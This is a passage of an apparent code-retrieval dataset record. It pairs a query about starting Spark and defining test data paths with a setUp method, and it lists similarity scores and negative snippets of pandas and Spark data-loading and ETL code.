data\n v = list(self.variables)\n v.append('metadata')\n for i in v:\n if i in self.dataConfig:\n\n self._logger.debug('Reading %s...' 
% self.dataConfig[i])\n if i == 'metadata':\n dp_final = pd.read_csv(self.dataConfig[i],\n index_col='primary_id')\n #Ensure all stations are all caps.\n dp_final.index = [s.upper() for s in dp_final.index]\n\n elif self.dataConfig[i]:\n dp_full = pd.read_csv(self.dataConfig[i],\n index_col='date_time',\n parse_dates=[0])\n dp_full.columns = [s.upper() for s in dp_full.columns]\n\n if sta is not None:\n\n data_sta = dp_full.columns.str.upper()\n\n # Grab IDs from user list thats also in Data\n self.stations = [s for s in data_sta if s in sta]\n dp = dp_full[dp_full.columns[(data_sta).isin(sta)]]\n\n else:\n dp = dp_full\n\n # Only get the desired dates\n dp_final = dp[self.start_date:self.end_date]\n\n if dp_final.empty:\n raise Exception(\"No CSV data found for {0}\"\n \"\".format(i))\n\n setattr(self, i, dp_final)", "def read_csv_data(url):\n\n csv_data = pd.read_csv(url)\n\n return csv_data", "def read_traffic_sensor_from_csv(path: str) -> pd.DataFrame:\n\n df = pd.read_csv(path)\n df[\"measuredTime\"] = pd.to_datetime(df[\"measuredTime\"])\n df.set_index(\"measuredTime\", inplace=True)\n return df", "def data_import(path):\n train_path = os.path.join(path, \"train.csv\")\n test_path = os.path.join(path, \"test.csv\")\n df_train = pd.read_csv(train_path)\n df_test = pd.read_csv(test_path)\n return df_train, df_test", "def load_to_dataframe(self) -> DataFrame:\n return read_csv(self._csv_path, converters={\n # Check if embedding size is the empty string,\n # as it would be for Count models\n \"Embedding size\": lambda v: int(float(v)) if len(v) > 0 else nan\n })", "def import_data():\n import pandas as pd\n \n df = pd.read_csv('Company_Bankruptcy_Prediction.csv')\n return df", "def read_csv():\n csv_file = \"dow.csv\"\n\n # read the data from the csv file, parsing the Dates to make the x-axis, setting index_col to zero to remove it\n data_frame = pd.read_csv(csv_file, parse_dates=True, index_col=0)\n return data_frame", "def read_csv_ur10(self, csv_file):\r\n df = pd.read_csv(csv_file, sep=';', decimal=',', header=0)\r\n return df", "def read_load_data_from_csv(csv_path):\n # Load the original DataFrame, use easier-to-read column names, and drop unnecessary column\n original_df = pd.read_csv(csv_path).rename(columns={\"OperDay\" : \"Date\"}).drop([\"TOTAL\", \"DSTFlag\"],axis=1)\n\n original_df.name = csv_path.split(\"_\")[1]\n\n # Combine the originally separate date and hour columns into a single DateTime column\n return combine_date_and_hour_columns(original_df)", "def get_raw_data_from_csv():\n data_df = pd.read_csv(static_constants.RAW_DATA_PATH)\n return data_df", "def load_data(path):\n\n columns = ['Item Year', 'Original Value', 'Standard Value', 'Original Currency',\n 'Standard Currency', 'Orignal Measure', 'Standard Measure', 'Location',\n 'Commodity']\n col_type = [int, float, float, object, object, object, object, object]\n\n col_type_dict = dict(zip(columns, col_type))\n\n au_df = pd.read_csv(path, usecols=columns)\n au_df = au_df.astype(col_type_dict)\n au_df.name = 'AU_data'\n \n return au_df, columns", "def import_csv_dataset():\n import_fields = pd.read_csv('redacted-2020-june-30-wprdc-.csv', header=None).to_numpy()[0, :]\n import_values = pd.read_csv('redacted-2020-june-30-wprdc-.csv').to_numpy()\n import_values = clean_values(import_values)\n return import_fields, import_values", "def dataset_from_csv(self, filename, time_column='point_in_time'):\n return pd.from_csv(filename, parse_dates=[time_column])", "def load_image_metadata(path_to_data_csv: str) -> 
pd.DataFrame:\n return pd.read_csv(path_to_data_csv)", "def from_csv(cls, name, csv, **kwargs):\r\n data = pd.read_csv(csv, **kwargs)\r\n return Dataset(name, data, **kwargs)", "def _load_csv(root_path, table_meta):\n relative_path = os.path.join(root_path, table_meta['path'])\n dtypes = _read_csv_dtypes(table_meta)\n\n data = pd.read_csv(relative_path, dtype=dtypes)\n data = _parse_dtypes(data, table_meta)\n\n return data", "def read_csv(self, csv_file):\n mylog.debug('Reading csv file %s for data' % csv_file)\n csv_data = pandas.read_csv(csv_file)\n mylog.debug('Read of csv file complete.')\n #mylog.debug('%s' % csv_data)\n #sometimes the csv has an empty dataframe #\n if csv_data.empty:\n mylog.debug('Data frame is empty; repopuating data')\n csv_info = []\n for item in csv_data:\n #add the data one cell at a time to the list #\n #for some reason, some csvs have the data #\n #with random decimal points #\n csv_info.append(item.split(\".\")[0])\n df = pandas.DataFrame(columns=csv_info)\n df.loc[0]=csv_info\n #write the data from the list back into the cells#\n #one at a time #\n for column in range(0, len(csv_info)): \n df.iloc[0,column] = csv_info[column]\n csv_data = df \n return csv_data", "def import_data():\n data = pd.read_csv('partA/bikes_October18.csv', ',')\n return data", "def _csv_engine(filename, node):\n sep = node.get(\"sep\", \",\")\n header = node.get(\"header\", 0)\n logger.debug(\n \"Parsing CSV '{}'. sep={}, header={}.\".format(filename, sep, header)\n )\n index = node.get(\"index\")\n encoding = node.get(\"encoding\")\n if not index:\n raise InvalidConfig(\"An 'index' column is required. It should \"\n \"be the sample id column.\")\n\n df = pd.read_csv(filename, sep=sep, header=header, encoding=encoding)\n df.set_index(index, verify_integrity=True, inplace=True, drop=True)\n df.index = df.index.astype(str)\n\n return df", "def get_data_from_csv_full_path(filepath, datatypes, date_column_list):\n\n dataframe = pandas.read_csv(filepath, dtype=datatypes, date_parser=pandas.to_datetime, parse_dates=date_column_list)\n\n return dataframe", "def load_dataset_from(csv_file: str) -> pd.DataFrame:\n\n print(\">>> LOADING DATASET FROM FILE {filename}\".format(filename=csv_file))\n if not csv_file.endswith(\".csv\"):\n print(\"File has to be CSV type file!\")\n exit(1)\n\n try:\n data = pd.read_csv(csv_file)\n print(\">>> Finished loading data!\")\n return data\n except FileNotFoundError:\n print(\"File couldn't be found. 
Verify if '{f_path}' is a correct file path!\".format(f_path=csv_file))\n exit(1)", "def load_data(input_file):\n print('loading file:', input_file)\n df = pd.DataFrame()\n show_progress = make_show_progress()\n chunk_iterator = pd.read_csv(input_file,\n compression='gzip',\n chunksize=100_000,\n index_col=0,\n usecols=cols_to_use,\n dtype=data_types,\n parse_dates=dates_to_parse,\n infer_datetime_format=True\n )\n for chunk in chunk_iterator:\n df = pd.concat([df, chunk])\n show_progress(len(chunk))\n return df", "def read(self):\n \n self.df = pd.read_csv(self.path, encoding = \"ISO-8859-1\")", "def read_csv(self, path):\n for file in os.listdir(path):\n if file[-4:] == \".csv\":\n name = file[:-4]\n table_index_header = cfg.get_list(\"table_index_header\", name)\n filename = os.path.join(path, file)\n self.input_data[name] = pd.read_csv(\n filename,\n index_col=list(range(int(table_index_header[0]))),\n header=list(range(int(table_index_header[1]))),\n squeeze=(\"series\" not in name),\n )\n self.check_input_data(warning=False)\n self.add_meta_data()\n return self", "def load() -> DataFrame:\n return load_file(__file__, \"default.csv.gz\")", "def load_data():\n domain_data_path = os.path.join(DOMAIN_DATA_DIR, DOMAIN_DATA_FILENAME)\n df = pd.read_csv(\n domain_data_path,\n sep=\",\",\n header=0,\n index_col=False,\n )\n return df", "def loadCSV(input_file):", "def load(self, path, separator=\",\", header_type=\"infer\", nrows=None,\n skiprows=None, usecols=None):\n\n return pd.read_csv(path, header=header_type, sep=separator,\n usecols=usecols, nrows=nrows, skiprows=skiprows)", "def reader(self):\n df = pd.read_csv(self.path)\n return df", "def loadData(path_file):\n data = pd.read_csv(path_file) \n data.head()\n return data", "def from_csv(cls, filename, pulse_number=None):\n df = pd.read_csv(filename)\n return cls._sort_and_filter_dataframe(df, pulse_number)", "def read_partslist_csv(csv: str)->pd.DataFrame:\n try:\n p_df = pd.read_csv(csv, sep='\\t', header=0, engine='python', na_values='', skipfooter=3,\n dtype={'BLItemNo': str, 'BLColorId': int, 'LDrawColorId': int, 'Qty': int})\n p_df = p_df.fillna({'BLColorId': '', 'Qty': 0})\n p_df = p_df.rename(mapper={'BLItemNo': 'ItemId', 'BLColorId': 'Color'}, axis=1)\n p_df = p_df.drop(columns=['ElementId', 'LdrawId', 'LDrawColorId'])\n return p_df\n except FileNotFoundError as e:\n print(e)\n return pd.DataFrame()", "def create_dataframe():\r\n\r\n df = pd.read_csv('data/data.csv', header=0)\r\n return df", "def _load(self, config: Dict):\n return pd.read_csv(config['path'])", "def load_data(filepath):\n\n file_path_casted = Path(filepath)\n if not file_path_casted.exists():\n raise FileNotFoundError(\"File does not exist.\")\n\n data = pd.read_csv(filepath, delimiter=\",\")\n\n return data", "def get_data(filename):\r\n return pd.read_csv(filename)", "def load_symbol_universe_data_from_csv(self, csv_fullpath):\n\n print(\"[{}] [INFO] Loading symbol universe data from csv...\".format(datetime.now().isoformat()))\n\n df = pd.read_csv(csv_fullpath)\n\n #--------------------------------------------------------------------------\n # Convert date column to type numpy datetime64.\n #--------------------------------------------------------------------------\n df.date = pd.to_datetime(df.date)\n\n return df", "def read_dataset():\n\n df = pd.read_csv('fake_job_postings.csv', index_col='job_id')\n return df", "def import_dataset(fpath):\r\n data = read_csv(fpath)\r\n print(data.head())\r\n print(data.shape)\r\n return data", "def 
load_data(sourcedatafile):\n with open(sourcedatafile, \"r\") as infile:\n data = pd.read_csv(infile, sep=\",\", encoding=\"utf8\", index_col=False)\n return data", "def load_data(txt_path: str = RAW_TXT) -> pd.DataFrame:\n df = pd.read_csv(txt_path)[INDICES]\n return df", "def initialize_from_file(filename):\r\n df = pd.read_csv(filename)\r\n return df", "def get_training_data(self, csv_path):\n data = pd.read_csv(csv_path)\n data[['Hashrate', 'Addresses', 'Supply', 'Trx_Fee', 'Daily_Trx']] = data[['Hashrate', 'Addresses', 'Supply', 'Trx_Fee', 'Daily_Trx']].apply(pd.to_numeric)\n data[['Timestamp']] = data[['Timestamp']].apply(pd.to_datetime)\n data = data[data['Timestamp'] < self.end_time]\n data = data[data['Timestamp'] > self.start_time]\n\n return data", "def load_data(path):\n try:\n data = pd.read_csv(path, sep='\\t')\n except FileNotFoundError:\n logger.exception(\"Traceback of data file '{}' not found.\".format(path))\n else:\n return data", "def load_log(dir_):\n df = pandas.read_csv(os.path.join(dir_, 'log.csv'),\n error_bad_lines=False,\n warn_bad_lines=True)\n if not len(df):\n print(\"empty df at {}\".format(dir_))\n return\n df['model'] = dir_\n return df", "def load_pandas():\n data = _get_data()\n return du.process_pandas(data, endog_idx=0)", "def load_pandas():\n data = _get_data()\n return du.process_pandas(data, endog_idx=0)", "def import_data(file):\n df = pd.read_csv(file, parse_dates=True, keep_date_col=True, sep=';')\n df = reduce_mem_usage(df)\n return df", "def csv_data_loader(path):\n\n logging.info(\"Loading file using SparkSession\")\n csvload = Spark.instance.spark() \\\n .read \\\n .format(\"csv\") \\\n .options(header=True) \\\n .options(mode=\"DROPMALFORMED\")\n\n return csvload.option(\"inferSchema\", \"true\").load(path)", "def read_data(self) -> pd.DataFrame:\n data = pd.read_csv(self.data_path)\n assert isinstance(data, pd.DataFrame)\n return data", "def read_data(self) -> pd.DataFrame:\n data = pd.read_csv(self.data_path)\n assert isinstance(data, pd.DataFrame)\n return data", "def read_csv(\n csv_file: str,\n header: Optional[Union[str, int, Sequence]] = 'infer',\n names: Optional[Sequence] = None) -> pd.DataFrame:\n\n if header is None and not names:\n names = constants.IMAGE_CSV_COLUMNS\n\n with tf.io.gfile.GFile(csv_file) as f:\n return pd.read_csv(f, names=names, header=header)", "def load(self) -> pd.DataFrame:\n if os.path.exists(self.file_name):\n df = pd.read_csv(self.file_name, index_col=0)\n df = self._clean(df)\n else:\n _LOG.debug(\"No file '%s'\", self.file_name)\n df = pd.DataFrame()\n return df", "def get_dataset(filepath):\n return pandas.read_csv(filepath, header='infer')", "def read_csv_to_dataframe(file_name):\n df = pd.read_csv(file_name)\n df = df.drop(['Unnamed: 0'], axis=1)\n return df" ]
[ "0.7997091", "0.76976955", "0.7580888", "0.75562894", "0.7530883", "0.75125337", "0.7335565", "0.7333322", "0.73209023", "0.72114277", "0.7200636", "0.71992266", "0.7190701", "0.71325487", "0.7120215", "0.71044284", "0.7094358", "0.7092082", "0.7048781", "0.70392513", "0.70304245", "0.7029713", "0.7028822", "0.70284164", "0.7022717", "0.70126516", "0.70021653", "0.6982259", "0.6982259", "0.6981705", "0.6980921", "0.6980921", "0.6980921", "0.69584364", "0.6952076", "0.6923535", "0.691536", "0.6913593", "0.6911689", "0.6909517", "0.69074506", "0.68760824", "0.68605506", "0.6852409", "0.6851214", "0.68451864", "0.6838844", "0.6836003", "0.68254226", "0.68247235", "0.6818571", "0.6817708", "0.6816959", "0.68107253", "0.6808245", "0.68059665", "0.6803133", "0.67891383", "0.6774891", "0.67747384", "0.6765674", "0.6756252", "0.67422557", "0.67342293", "0.67326105", "0.6730598", "0.6723805", "0.669369", "0.6690874", "0.6679025", "0.6675615", "0.6675264", "0.6670421", "0.6665945", "0.6665666", "0.6660609", "0.6654588", "0.664241", "0.6620393", "0.66029483", "0.6602152", "0.6574313", "0.65717936", "0.6551437", "0.65458435", "0.6534046", "0.6532417", "0.6528763", "0.65226275", "0.65220904", "0.6521562", "0.65150064", "0.65150064", "0.65104747", "0.6496992", "0.6495031", "0.6495031", "0.64911705", "0.6484918", "0.6483133", "0.6471677" ]
0.0
-1
Start Spark, define config and path to test data
def setUp(self): self.test_data_path = 'testing/test_data/'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def setUp(self):\n self.spark, self.log, self.config = start_spark(app_name = \"test_etl_job\",\n files='configs/etl_config.json')", "def setUp(self):\n with open(SRC_PATH + \"configs/etl_config.json\", \"r\") as f:\n self.config = json.loads(f.read())\n self.spark = SparkBuilder(\"test\").build_sc()\n self.test_data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), '../tests/test_data/')", "def spark():\n\n quiet_log4j()\n\n builder = (\n SparkSession.builder\n .master(\"local[2]\")\n .appName(\"pytest-pyspark-local-testing\")\n # By default spark will shuffle to 200 partitions, which is\n # way too many for our small test cases. This cuts execution\n # time of the tests in half.\n .config('spark.sql.shuffle.partitions', 4)\n )\n if 'XDG_CACHE_HOME' in os.environ:\n builder.config('spark.jars.ivy', os.path.join(os.environ['XDG_CACHE_HOME'], 'ivy2'))\n\n with builder.getOrCreate() as spark:\n yield spark", "def main():\n\n print(\"Initiating Spark session...\")\n print('-' * 50)\n spark = create_spark_session()\n \n # Use these settings if you want to test on the full\n # dataset, but it takes a LONG time.\n song_input_data = config['AWS']['SONG_DATA']\n log_input_data = config['AWS']['LOG_DATA']\n \n # Uncomment the two lines if you want to test on\n # minimal data\n #song_input_data = config['AWS']['SINGLE_SONG_DATA']\n #log_input_data = config['AWS']['SINGLE_LOG_DATA']\n \n output_data = config['AWS']['OUTPUT_DATA']\n \n print('-' * 50)\n print(\"Processing song data...\")\n print('-' * 50)\n print('')\n process_song_data(spark, song_input_data, output_data)\n \n print('-' * 50) \n print(\"Processing log data...\")\n print('-' * 50)\n print('')\n process_log_data(spark, song_input_data, log_input_data, output_data)", "def main():\n spark = create_spark_session()\n\n input_data = config['STORAGE']['INPUT_DATA']\n output_data = config['STORAGE']['OUTPUT_DATA']\n\n process_song_data(spark, input_data, output_data)\n process_log_data(spark, input_data, output_data)", "def spark():\n return SparkSession.builder.master(\"local\").appName(\"tests\").getOrCreate()", "def session_system_dataproc(session, py):\n session.interpreter = 'python{}'.format(py)\n session.virtualenv_dirname = 'system-dataproc-{}'.format(py)\n\n session.install('pytest', 'pytest-cov', 'mock', 'numpy')\n\n try:\n import pyspark\n except:\n raise RuntimeError(\"Please install pyspark and spark clusters to run \"\n \"tests\")\n\n # setups environment to be able to see Spark cluster\n session.env = {'PYTHONPATH': (':./'\n ':/usr/local/spark/python'\n ':/usr/local/spark/python/lib/py4j-0.10.4-src.zip')}\n\n session.run(\n 'py.test',\n 'tests/system/dataproc/',\n '--cov=.',\n '--cov-config=.coveragerc',\n '--cov-report=html')", "def test_pyspark(container):\n c = container.run(\n tty=True,\n command=['start.sh', 'python', '-c', 'import pyspark']\n )\n rv = c.wait(timeout=30)\n assert rv == 0 or rv[\"StatusCode\"] == 0, \"pyspark not in PYTHONPATH\"\n logs = c.logs(stdout=True).decode('utf-8')\n LOGGER.debug(logs)", "def main():\n spark = create_spark_session()\n\n # Used for local testing - commented out\n # input_data = \"./data/\"\n # output_data = \"./data/\"\n input_data = \"s3a://udacity-dend/\"\n output_data = \"s3a://allen-lesson4-datalake-bucket/\"\n\n process_song_data(spark, input_data, output_data)\n process_log_data(spark, input_data, output_data)\n spark.stop()", "def main():\n # Initiate Spark Session\n spark = create_spark_session()\n \n # Data files\n # Root Data Path\n # Uncomment below line 
for AWS S3\n #input_data = \"s3a://udacity-dend\"\n # Uncomment below line for local files\n input_data = \"data\"\n\n # Warehouse\n # Root WH\n # Uncomment below line for AWS S3\n #output_data = \"s3a://jerryespn-project-out\"\n # Uncomment below line for local files\n output_data = \"spark-warehouse\"\n \n process_song_data(spark, input_data, output_data) \n process_log_data(spark, input_data, output_data)", "def spark_config_set(is_spark_submit):\n if is_spark_submit:\n global sc, sqlContext\n sc = SparkContext()\n sqlContext = HiveContext(sc)", "def setUpClass(cls):\n \n logging.info(\"Logging from within setup\")\n cls.spark=SparkSession \\\n .builder \\\n .appName(\"sampleTest\") \\\n .master(\"local\") \\\n .getOrCreate()\n cls.spark.sparkContext.setLogLevel(\"ERROR\")", "def test_slurm_xsede_comet_spark(self):\n\n # Set environment variables\n os.environ['SLURM_NODELIST'] = 'nodes[1-2]'\n os.environ['SLURM_NPROCS'] = '24'\n os.environ['SLURM_NNODES'] = '2'\n os.environ['SLURM_CPUS_ON_NODE'] = '24'\n\n # Run component with desired configuration\n self.component._cfg = self.cfg_xsede_comet_spark\n self.component._configure()\n\n # Verify configured correctly\n self.assertEqual(self.component.cores_per_node, 24)\n self.assertEqual(self.component.gpus_per_node, 0)\n self.assertEqual(self.component.lfs_per_node['path'], \"/scratch/$USER/$SLURM_JOB_ID\")\n self.assertEqual(self.component.lfs_per_node['size'], 176105)\n self.assertEqual(self.component.lm_info['cores_per_node'], 24)\n\n return", "def spark(tmp_path_factory, app_name=\"Sample\", url=\"local[*]\"):\n\n with TemporaryDirectory(dir=tmp_path_factory.getbasetemp()) as td:\n config = {\n \"spark.local.dir\": td,\n \"spark.sql.shuffle.partitions\": 1,\n \"spark.sql.crossJoin.enabled\": \"true\",\n }\n spark = start_or_get_spark(app_name=app_name, url=url, config=config)\n yield spark\n spark.stop()", "def test_slurm_xsede_supermic_spark(self):\n\n # Set environment variables\n os.environ['SLURM_NODELIST'] = 'nodes[1-2]'\n os.environ['SLURM_NPROCS'] = '24'\n os.environ['SLURM_NNODES'] = '2'\n os.environ['SLURM_CPUS_ON_NODE'] = '24'\n\n # Run component with desired configuration\n self.component._cfg = self.cfg_xsede_supermic_spark\n self.component._configure()\n\n # Verify configured correctly\n self.assertEqual(self.component.cores_per_node, 20)\n self.assertEqual(self.component.gpus_per_node, 0)\n self.assertEqual(self.component.lfs_per_node['path'], \"/var/scratch/\")\n self.assertEqual(self.component.lfs_per_node['size'], 200496)\n self.assertEqual(self.component.lm_info['cores_per_node'], 20)\n\n return", "def spark_session_test() -> SparkSession:\n return SparkSession.builder.appName(\"pytest\").getOrCreate()", "def spark_context(request):\n spark = SparkSession.builder.master(\"local[1]\").appName(\"pytest-test\").getOrCreate()\n request.addfinalizer(lambda: spark.stop())\n\n quiet_py4j()\n return spark", "def main() -> None:\n ROOT_DIR = dirname(abspath(__file__))\n spark = create_spark_session()\n input_data = 's3a://udacity-dend/'\n output_data = ROOT_DIR + '/data/'\n\n process_song_data(spark, input_data, output_data)\n process_log_data(spark, input_data, output_data)", "def main(_config, _run):\n sacred.commands.print_config(_run)\n dump_config_and_makefile()\n prepare_and_train()", "def spark_setup(self):\n # Update the global variables for config details\n globals()[\"spark_token\"] = self.spark_bot_token\n globals()[\"bot_email\"] = self.spark_bot_email\n\n sys.stderr.write(\"Spark Bot Email: \" + 
self.spark_bot_email + \"\\n\")\n sys.stderr.write(\"Spark Token: REDACTED\\n\")\n\n # Setup the Spark Connection\n globals()[\"spark\"] = CiscoSparkAPI(access_token=self.spark_bot_token)\n globals()[\"webhook\"] = self.setup_webhook(self.spark_bot_name,\n self.spark_bot_url)\n sys.stderr.write(\"Configuring Webhook. \\n\")\n sys.stderr.write(\"Webhook ID: \" + globals()[\"webhook\"].id + \"\\n\")", "def main():\n spark_it_up()", "def setUpClass(self):\n\n # Create a new temporary folder\n self.dir = tempfile.mkdtemp(self.__name__, dir=os.getcwd()) # this folder should be on a hadoop file system\n\n if self.dir.startswith(\"/gpfs/\"):\n # remove /gpfs/ because on sdil hadoop-path starts at \"/smartdata/\"\n self.dir = \"/\" + self.dir.split(\"/\", 2)[2]\n \n dirhash._logger.info(\"writing test data to folder \\\"%s\\\"\", self.dir)\n \n # create some sub-folder\n os.makedirs(self.dir + \"/dir/subdir1\")\n os.makedirs(self.dir + \"/dir/subdir2\")\n os.makedirs(self.dir + \"/dir/subdir3\")\n os.makedirs(self.dir + \"/dir/emptysubdir\")\n dirhash._logger.info(\"created subdirectories\")\n \n # Create a lorem ipsum file\n with open(self.dir + \"/\" + self.LOREM_IPSUM_PATH, \"w\") as f:\n f.write(self.LOREM_IPSUM_TEXT)\n \n # Create an HTML file\n with open(self.dir + \"/\" + self.HELLO_WORLD_HTML_PATH, \"w\") as f:\n f.write(self.HELLO_WORLD_HTML_TEXT)\n \n # Create a file holding typical passwords\n with open(self.dir + \"/\" + self.PASSWORDS_PATH, \"w\") as f:\n f.write(self.PASSWORDS_TEXT)\n \n # just a few characters\n with open(self.dir + \"/\" + self.ABC_PATH, \"w\") as f:\n f.write(self.ABC_TEXT)\n \n # an empty file\n with open(self.dir + \"/\" + self.EMPTY_FILE_PATH, \"w\") as f:\n f.write(\"\")\n \n # create a file of 32 * 1024 * 1024 zero bytes\n with open(self.dir + \"/\" + self.MANY_ZEROS_PATH, \"wb\") as f:\n f.write(b\"\\0\" * (32 * 1024 * 1024))\n \n # create a spark context for execution, that will run all jobs locally\n self._context = SparkContext(appName=\"dirhash_test\")\n self._context.addPyFile('dirhash.py')", "def main():\n spark = create_spark_session()\n input_data = \"s3a://udacity-dend/\"\n output_data = \"data/analytics\"\n \n process_song_data(spark, input_data, output_data) \n process_log_data(spark, input_data, output_data)", "def main():\n spark = create_spark_session()\n logging.info('Spark Session created')\n input_data = \"s3a://udacity-dend/\"\n output_data = \"s3a://dend-emr-project\"\n #input_data = './data/'\n #output_data = '/Users/daniel/Desktop/output/'\n logging.info(f'Set input path to {input_data}')\n logging.info(f'Set output path to {output_data}')\n \n copy_raw_data(spark, input_data, output_data)\n\n s3_data = restore_data_from_s3(spark, output_data)\n \n sas_desc_string = load_sas_desc_file(input_data)\n \n process_fact_table(spark, s3_data, output_data, sas_desc_string)\n \n process_dim_tables(spark, s3_data, output_data, sas_desc_string)\n\n data_quality_check(spark, output_data)\n \n logging.info('ETL process successfully finished.')", "def getSparkContext():\n conf = (SparkConf()\n .setMaster(\"local\") # run on local\n .setAppName(\"Logistic Regression\") # Name of App\n .set(\"spark.executor.memory\", \"1g\")) # Set 1 gig of memory\n sc = SparkContext(conf = conf) \n return sc", "def spark(self, *args, **kwargs):\n self.spark_submit(*args, **kwargs)", "def __init__(self, conf: ExpConfig, estep_conf: EStepConfig, model: Trainable, data_file: str):\n if tvo.get_run_policy() == \"mpi\":\n init_processes()\n dataset = 
get_h5_dataset_to_processes(data_file, (\"test_data\", \"data\"))\n\n setattr(conf, \"test_dataset\", data_file)\n super().__init__(conf, estep_conf, model, None, dataset)", "def spark_unit_tests(global_args: dict = None, verbose: bool = False):\n if global_args is None:\n global_args = globals()\n\n conf = SparkConf()\n\n # Extra package for tests\n confdic = {\n \"spark.python.daemon.module\": \"coverage_daemon\"\n }\n\n # Use only 2 threads for tests\n conf.setMaster(\"local[2]\")\n\n # Name of the test job\n conf.setAppName(\"test_spark_job\")\n\n for k, v in confdic.items():\n conf.set(key=k, value=v)\n\n spark = SparkSession\\\n .builder\\\n .config(conf=conf)\\\n .getOrCreate()\n\n global_args[\"spark\"] = spark\n\n # Numpy introduced non-backward compatible change from v1.14.\n if np.__version__ >= \"1.14.0\":\n np.set_printoptions(legacy=\"1.13\")\n\n sys.exit(doctest.testmod(globs=global_args, verbose=verbose)[0])", "def _environment(self):\n\n self.spark_home = self._config_default(\"spark-home\",\n self._context(SparkSubmit.SPARK_HOME, default = os.environ.get(SparkSubmit.SPARK_HOME,None)))\n assert self.spark_home, \"unable to detect SPARK_HOME. set SPARK_HOME as directed in the task documentation\"\n assert os.path.exists(self.spark_home), \"provided SPARK_HOME doesn't exists\"\n\n spark_config = {'cluster-config': {}, 'other-config': {}}\n if 'config-file' in self._config_keys():\n spark_config.update(yaml.load(open(self._config('config-file')))['spark-config'])\n\n self.app_config = []\n\n spark_app = self._config('app-config')\n self.app_config.append(spark_app['application'])\n app_params = SparkSubmit._flat_node_to_cmd_line_args(spark_app['params']) if 'params' in spark_app else []\n self.app_config.extend(app_params)\n if 'resources' in spark_app:\n resources = [ ['--%s' % item] + (spark_app['resources'][item]) for item in spark_app['resources'].keys() ]\n self.resources = list(itertools.chain(*resources))\n else:\n self.resources = []\n\n\n cluster_config = self._config_default('cluster-config', {})\n cluster_config.update(spark_config['cluster-config'])\n self.cluster_options = list(itertools.chain(*[ ['--%s' % item, str(cluster_config[item]) ] for item in cluster_config.keys() ]))\n\n\n ##other options\n ## cluster options\n other_options = self._config_default('other-config',{})\n cluster_config.update(spark_config['other-config'])\n self.other_options = list(itertools.chain(*[ ['--%s' % item, str(other_options[item]) ] for item in other_options.keys() ]))", "def test_inputmode_spark(self):\n def _map_fun(args, ctx):\n import tensorflow as tf\n cluster, server = TFNode.start_cluster_server(ctx)\n if ctx.job_name == \"ps\":\n server.join()\n elif ctx.job_name == \"worker\":\n with tf.device(tf.train.replica_device_setter(\n worker_device=\"/job:worker/task:%d\" % ctx.task_index,\n cluster=cluster)):\n x = tf.placeholder(tf.int32, [None, 1])\n sq = tf.square(x)\n init_op = tf.global_variables_initializer()\n with tf.train.MonitoredTrainingSession(is_chief=(ctx.task_index == 0)) as sess:\n tf_feed = TFNode.DataFeed(ctx.mgr, False)\n while not sess.should_stop() and not tf_feed.should_stop():\n outputs = sess.run([sq], feed_dict={x: tf_feed.next_batch(10)})\n tf_feed.batch_results(outputs[0])\n\n input = [[x] for x in range(1000)] # set up input as tensors of shape [1] to match placeholder\n rdd = self.sc.parallelize(input, 10)\n cluster = TFCluster.run(self.sc, _map_fun, tf_args={}, num_executors=self.num_workers, num_ps=0, input_mode=TFCluster.InputMode.SPARK)\n 
rdd_out = cluster.inference(rdd)\n rdd_sum = rdd_out.sum()\n self.assertEqual(rdd_sum, sum([x * x for x in range(1000)]))\n cluster.shutdown()", "def main():\n spark = create_spark_session()\n input_data = \"s3a://udacity-dend/\"\n output_data = \"s3a://udacity-data-lake/output/\"\n\n process_song_data(spark, input_data, output_data)\n process_log_data(spark, input_data, output_data)", "def main(input_dir, output):\n\tspark = create_spark_session()\n\tprocess_header_data(spark, input_dir, output)", "def create_spark_session(self):\n\n spark_jar_path = os.getenv(\"SPARK_JARS_PATH\")\n spark_jars = [os.path.join(spark_jar_path, jars) for jars in os.listdir(spark_jar_path)] \n\n self.spark = SparkSession\\\n .builder\\\n .config(\"spark.jars\", \",\".join(spark_jars))\\\n .appName(appname)\\\n .getOrCreate()", "def launch(config):\n \n launch_with_configs([config])", "def __init__(self,env,config_file):\n #load all the properties\n self.properties = util.load_application_properties(env, config_file)\n self.cassandra_server = self.properties[\"cassandra.host.name\"]\n self.cassandra_trip_table = self.properties[\"cassandra.trip_data_table\"]\n self.cassandra_stats_table = self.properties[\"cassandra.trip_stats_table\"]\n self.cassandra_keyspace = self.properties[\"cassandra.trip.keyspace\"]\n self.spark_master = self.properties[\"spark.master\"]\n self.s3_url=self.properties[\"batch_s3_url\"]\n\n #initialize SparkConf and SparkContext along with cassandra settings\n self.conf = SparkConf().setAppName(\"trip\").set(\"spark.cassandra.connection.host\",self.cassandra_server)\n self.sc = SparkContext(conf=self.conf)\n self.sqlContext = SQLContext(self.sc)", "def main():\n spark = create_spark_session()\n input_data = \"s3a://udacity-dend/\"\n output_data = \"s3a://udacity-nanodegree-data-engineer/\"\n \n process_song_data(spark, input_data, output_data) \n process_log_data(spark, input_data, output_data)", "def cli():\n # Configuration\n AppConfig()\n\n # Parse the cli arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('standard_data_path', help='path to the standard data directory')\n parser.add_argument('queue', help='job queue')\n parser.add_argument('--app-name', help='spark application name which must contain the application prd',\n default='gmt00-diaman-ai')\n parser.add_argument('--driver-mem', help='amount of memory to use for the driver process',\n default='4g')\n parser.add_argument('--driver-cores', help='number of cores to use for the driver process',\n default=1)\n parser.add_argument('--executor-mem', help='amount of memory to use per executor process',\n default='8g')\n parser.add_argument('--executor-cores', help='number of cores to use on each executor',\n default=4)\n parser.add_argument('--min-executors', help='minimum number of executors to run if dynamic allocation is enabled',\n default=4)\n parser.add_argument('--max-executors', help='maximum number of executors to run if dynamic allocation is enabled',\n default=12)\n parser.add_argument('--ini-executors', help='initial number of executors to run if dynamic allocation is enabled',\n default=4)\n args = parser.parse_args()\n\n # Instantiate spark\n _, spark_session = spark_config.get_spark(app_name=args.app_name,\n queue=args.queue,\n driver_mem=args.driver_mem,\n driver_cores=args.driver_cores,\n executor_mem=args.executor_mem,\n executor_cores=args.executor_cores,\n min_executors=args.min_executors,\n max_executors=args.max_executors,\n ini_executors=args.ini_executors)\n\n # Run the train pipeline\n 
